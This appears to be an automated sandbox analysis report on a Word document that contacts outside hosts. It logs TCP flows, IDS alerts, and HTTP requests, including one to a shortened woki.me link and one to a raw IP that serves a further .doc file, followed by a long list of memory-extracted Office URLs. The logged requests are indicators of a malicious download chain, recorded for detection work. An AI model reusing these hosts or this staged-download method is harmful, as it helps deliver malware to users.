Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:53982 -> 142.132.211.198:443
Source: global trafficTCP traffic: 142.132.211.198:443 -> 192.168.2.24:53982
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53979
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 67.217.247.193:80
Source: global trafficTCP traffic: 67.217.247.193:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 2.22.242.9:443 -> 192.168.2.24:53985
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 2.22.242.9:443 -> 192.168.2.24:53985
Source: global trafficTCP traffic: 2.22.242.9:443 -> 192.168.2.24:53985
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443
Source: global trafficTCP traffic: 192.168.2.24:59385 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:59385
Source: global trafficTCP traffic: 192.168.2.24:59385 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:59385
Source: global trafficTCP traffic: 192.168.2.24:59385 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:59385
Source: global trafficTCP traffic: 192.168.2.24:59385 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.24:53979 -> 67.217.247.193:80
Source: global trafficTCP traffic: 192.168.2.24:53985 -> 2.22.242.9:443

Networking

barindex
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53979 -> 67.217.247.193:80
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:53973 -> 142.132.211.198:443
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53978 -> 142.132.211.198:443
Source: global trafficTCP traffic: 192.168.2.24:59385 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 142.132.211.198 142.132.211.198
Source: Joe Sandbox ViewASN Name: SRS-6-Z-7381US SRS-6-Z-7381US
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /DQaKj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: woki.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: unknownTCP traffic detected without corresponding DNS query: 67.217.247.193
Source: global trafficHTTP traffic detected: GET /DQaKj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: woki.meConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 67.217.247.193
Source: global trafficDNS traffic detected: DNS query: woki.me
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C8A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://67.217.247.193
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://67.217.247.193/318/semina/sem/
Source: WINWORD.EXE, 00000000.00000002.3014353417.000001D79C644000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3014847999.000001D79C89A000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003578634.000001D79BACC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003494409.000001D79BA32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://67.217.247.193/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoo
Source: WINWORD.EXE, 00000000.00000002.3006260315.000001D79BF18000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://67.217.247.193:80/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwith
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WINWORD.EXE, 00000000.00000002.3002623441.000001D79B566000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.micrw
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidese
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesr
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects
Source: WINWORD.EXE, 00000000.00000002.3001126261.000001D799940000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003778159.000001D79BBDA000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003494409.000001D79BA32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003578634.000001D79BACC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3009141410.000001D79C404000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfig
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxs
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxs/1.2
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.box.com/api/wopibootstrapperem4vekradyd8j4setf04baizn2np7btjhttps://www.box.com/offi
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledted
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated.t
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeIqx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apit~
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechJ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechZtd
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech~uH
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.comR
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.come
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.ai
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.microsoftstream.com/api/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.microsoftstream.com/api/he
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.of
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netn
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netz
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.ofice.net
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/drive/root/roota
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/ares/ers
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/v1.0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetse
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsspxN
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importsE
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importsspxt
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.scheduler.
Source: WINWORD.EXE, 00000000.00000002.2998489516.000001D78D3F8000.00000004.00000020.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://app.powerbi.com
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop-dogfood.officeppe.com
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop-int.officeppe.com
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2=Q
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.comared
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://broadcast.officeapps.live.com/m/broadcasthost.asmx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://canary.designerapp.officeapps.live.com/designerapp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fontsradev2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fontss
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings&u
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.desktop.cshtmltmlAnt
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.mac.cshtmltml
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab)
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/g
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies)~
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macj
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey#
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/xgL
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/OfficeE
